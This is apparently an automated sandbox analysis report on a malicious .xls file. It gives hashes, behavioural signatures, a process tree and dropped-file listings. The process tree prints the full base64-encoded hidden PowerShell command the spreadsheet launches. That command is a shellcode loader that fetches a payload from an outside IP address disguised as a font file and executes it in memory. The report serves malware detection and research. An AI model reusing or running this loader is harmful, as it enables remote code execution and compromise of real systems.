Analysis
-
max time kernel
47s -
max time network
54s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
13-11-2024 21:45
Behavioral task
behavioral1
Sample
35cdf01f357d5cc70735fc5c0e1dda448d4ba79786e9cba60f31b97139953727.xls
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
35cdf01f357d5cc70735fc5c0e1dda448d4ba79786e9cba60f31b97139953727.xls
Resource
win10v2004-20241007-en
General
-
Target
35cdf01f357d5cc70735fc5c0e1dda448d4ba79786e9cba60f31b97139953727.xls
-
Size
46KB
-
MD5
4360b82910d2577e2fbb3f10e423395c
-
SHA1
9d3d039e74400e7ea02bf359af9ba31fe36cec8e
-
SHA256
35cdf01f357d5cc70735fc5c0e1dda448d4ba79786e9cba60f31b97139953727
-
SHA512
7c971060c5a40a961ea6c742f17afc879d82ca828f1beb886aeb8e1dddcf6a3a9e12a799b26e99c42b65f2d3808b781b6eb4d101315cee2cb807ecc68b9a3de9
-
SSDEEP
768:3X4SFsv66g3KnF439NKC54kkGfn+cL2XdA8YRtukODXwXqt7sNAQYzKEm8ZRu9UF:YSFsv66g3KnF439NKC54kkGfn+cL2Xd+
Malware Config
Extracted
https://194.182.164.149:8080/fontawesome.woff
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
powershell.exedescription pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 4020 2080 powershell.exe 82 -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid Process 23 4020 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
EXCEL.EXEdescription ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
EXCEL.EXEdescription ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid Process 2080 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid Process 4020 powershell.exe 4020 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid Process Token: SeDebugPrivilege 4020 powershell.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
EXCEL.EXEpid Process 2080 EXCEL.EXE 2080 EXCEL.EXE -
Suspicious use of SetWindowsHookEx 14 IoCs
Processes:
EXCEL.EXEpid Process 2080 EXCEL.EXE 2080 EXCEL.EXE 2080 EXCEL.EXE 2080 EXCEL.EXE 2080 EXCEL.EXE 2080 EXCEL.EXE 2080 EXCEL.EXE 2080 EXCEL.EXE 2080 EXCEL.EXE 2080 EXCEL.EXE 2080 EXCEL.EXE 2080 EXCEL.EXE 2080 EXCEL.EXE 2080 EXCEL.EXE -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
EXCEL.EXEpowershell.execsc.exedescription pid Process procid_target PID 2080 wrote to memory of 4020 2080 EXCEL.EXE 87 PID 2080 wrote to memory of 4020 2080 EXCEL.EXE 87 PID 4020 wrote to memory of 4440 4020 powershell.exe 89 PID 4020 wrote to memory of 4440 4020 powershell.exe 89 PID 4440 wrote to memory of 4628 4440 csc.exe 91 PID 4440 wrote to memory of 4628 4440 csc.exe 91
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\35cdf01f357d5cc70735fc5c0e1dda448d4ba79786e9cba60f31b97139953727.xls"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2080 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -nop -w hidden -Enc JABXAGkAbgAzADIAIAA9ACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFcAaQBuADMAMgAgAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACwAIABDAGgAYQByAFMAZQB0AD0AQwBoAGEAcgBTAGUAdAAuAEEAbgBzAGkAKQBdAA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAANAAoAIAAgACAAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsAA0ACgAgACAAIAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwADQAKACAAIAAgACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgAsACAAUwBlAHQATABhAHMAdABFAHIAcgBvAHIAPQB0AHIAdQBlACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAVQBJAG4AdAAzADIAIABXAGEAaQB0AEYAbwByAFMAaQBuAGcAbABlAE8AYgBqAGUAYwB0ACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABoAEgAYQBuAGQAbABlACwADQAKACAAIAAgACAAVQBJAG4AdAAzADIAIABkAHcATQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAKQA7AA0ACgB9AA0ACgAiAEAADQAKAEEAZABkAC0AVAB5AHAAZQAgACQAVwBpAG4AMwAyAA0ACgANAAoAIwAgAEkAUwBDAHsAaABlAGMAYQByAG0AZQBuAF8AdwBhAHMAXwBoAGUAcgBlAH0ADQAKAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0AIAA7AA0ACgAkAHMAaABlAGwAbABjAG8AZABlACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAEwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAiAGgAdAB0AHAAcwA6AC8ALwAxADkANAAuADEAOAAyAC4AMQA2ADQALgAxADQAOQA6ADgAMAA4ADAALwBmAG8AbgB0AGEAdwBlAHMAbwBtAGUALgB3AG8AZgBmACIAKQANAAoAaQBmACAAKAAkAHMAaABlAGwAbABjAG8AZABlACAALQBlAHEAIAAkAG4AdQBsAGwAKQAgAHsARQB4AGkAdAB9ADsADQAKACQAcwBpAHoAZQAgAD0AIAAkAHMAaABlAGwAbABjAG8AZABlAC4ATABlAG4AZwB0AGgADQAKAA0ACgBbAEkAbgB0AFAAdAByAF0AJABhAGQAZAByACAAPQAgAFsAVwBpAG4AMwAyAF0AOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsACQAcwBpAHoAZQAsADAAeAAxADAAMAAwACwAMAB4ADQAMAApADsADQAKAFsAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBNAGEAcgBzAGgAYQBsAF0AOgA6AEMAbwBwAHkAKAAkAHMAaABlAGwAbABjAG8AZABlACwAIAAwACwAIAAkAGEAZABkAHIALAAgACQAcwBpAHoAZQApAA0ACgAkAHQAaABhAG4AZABsAGUAPQBbAFcAaQBuADMAMgBdADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABhAGQAZAByACwAMAAsADAALAAwACkAOwANAAoAWwBXAGkAbgAzADIAXQA6ADoAVwBhAGkAdABGAG8AcgBTAGkAbgBnAGwAZQBPAGIAagBlAGMAdAAoACQAdABoAGEAbgBkAGwAZQAsACAAWwB1AGkAbgB0ADMAMgBdACIAMAB4AEYARgBGAEYARgBGAEYARgAiACkA2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4020 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\41e1yewk\41e1yewk.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:4440 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC7D4.tmp" "c:\Users\Admin\AppData\Local\Temp\41e1yewk\CSC861B160FF8BB4AB8AC5355C65504943.TMP"4⤵PID:4628
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD50446f0949ef5cd08e3bd174052d38132
SHA12ae1836597202943746cedc7e0ef926db01d08dd
SHA256ddca42404681f563f9a9e928636b5adbf781bb0fe1c1d173b9796c56acc370a6
SHA5123be7858f9a43f292ea759a40810d130c355c0d05a91e93e9d677df62520520b0b4b3b56f478669d94200e57294268d744aff6a7e34855de3bd0439387fe62b15
-
Filesize
1KB
MD5208fb473e12e7601c9881e381b0366cf
SHA116e4e61ea43073afeac20a6be6c939176f1551ba
SHA256bf3bc45d310644372491a4983817e189cf34901b1e08d01348037ea2f3fb760f
SHA512b25232467bf4e4b5ff73a4bf95fe92abd8ac8325424b4fe76eb371e871bb9c4d2fa275f961632db4e85dada2af3c94795ef7f4f4bf4627b3da0cf2364743328d
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
Filesize1KB
MD5fe82fbdf8666e5a2144a702cd7157e07
SHA17679d739f10e73efd4fae20bc57bfdcda71a8933
SHA2566356e2dfe0826f087da6cfd1cfc4d3d97352cc564ce4e3f6dbf2c20a6980bba9
SHA512b9e814ea3986543ac3bc27316fd2dd6afda4707de8640ab6f7d1ff966bef709079e7729e063e2f58340873183a76bff3a34c41bfe70fb22df813d0b782d7534b
-
Filesize
631B
MD5f4dd5c682eb7b3b679f084261bfc7c4c
SHA170f75d7a4e42c185eb09139ed3c6f7338a2219c2
SHA2562908bfece2edd241dc4f7cc26608c3254f7e5b896a38114618d56b65d4fc4319
SHA5128f91148a6bd15f8182ef00b3e75b008eacda414852e8169112013377e4b9b88e1a0be73c8e0c212b8c0a51c24fbb2849c44d742f6019c9c5bf0dfb0e28a1b83d
-
Filesize
369B
MD5ec13fd8aa1162c5fb20a284fdf1af2d4
SHA12e5075be16cc6aae88440cc33fe61f34900e3a3d
SHA256d8312d95d0e6a5ac9fb511814283b137cf1ce5272c8271042278dbde23bbb83f
SHA512b31c30aab1f1d5b9e38756d7bcf539574e37acef7e4191d3e08341a2b942cc131f35a25a23b257461fbfb87921bd44635269318a25d0bbd6e23c6ba8d88d3c38
-
Filesize
652B
MD557dc94cee2a827047d9d31045b1e1aa7
SHA1445e06ccf8cbbf5b611db074baa7fc4265a5d9b1
SHA25623cd70a43fca7cd7b95a2285d1e010c529bf80c642639963b7053a7361558a2d
SHA5120dc210b2d28aa4251f239b406c07c2ec571453a11b4394356e3bb3a8d9e992bf79b30d7aef6ac600da7f9bbc2efb396cbd3b4121a5a316f47e9c6f994490d89f